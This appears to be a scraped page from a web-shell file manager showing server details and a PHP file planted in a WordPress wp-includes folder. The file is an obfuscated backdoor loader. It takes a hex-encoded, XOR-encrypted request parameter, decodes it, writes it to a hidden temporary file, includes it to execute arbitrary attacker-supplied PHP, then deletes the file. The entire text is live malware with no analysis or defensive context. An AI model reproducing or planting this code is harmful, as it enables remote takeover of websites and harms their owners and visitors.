HEX
Server: LiteSpeed
System: Linux 110.webhostingindonesia.co.id 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: uvlnfyba (10197)
PHP: 7.4.33
Disabled: opcache_get_status,exec,passthru,shell_exec,system,popen,mail,proc_open,show_source,
Upload Files
File: /home/jkwebsite.my.id/data.jkwebsite.my.id/wp-includes/top_1758443871.php
<!--gXfDNwRw-->
<?php

if(!empty($_REQUEST["en\x74"])){
$bind = hex2bin($_REQUEST["en\x74"]);
$mrk   =   ''    ;      $g=0;do{$mrk.=chr(ord($bind[$g])^78);$g++;}while($g<strlen($bind));
$comp = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TMP"), "/var/tmp", sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp"]);
foreach ($comp as $key => $flg) {
            if (array_product([is_dir($flg), is_writable($flg)])) {
            $ptr = "$flg" . "/.pset";
            if ($itm = fopen($ptr, 'w')) {
    fwrite($itm, $mrk);
    fclose($itm);
    include_once $ptr;
    unlink($ptr);
    die();
}
        }
}
}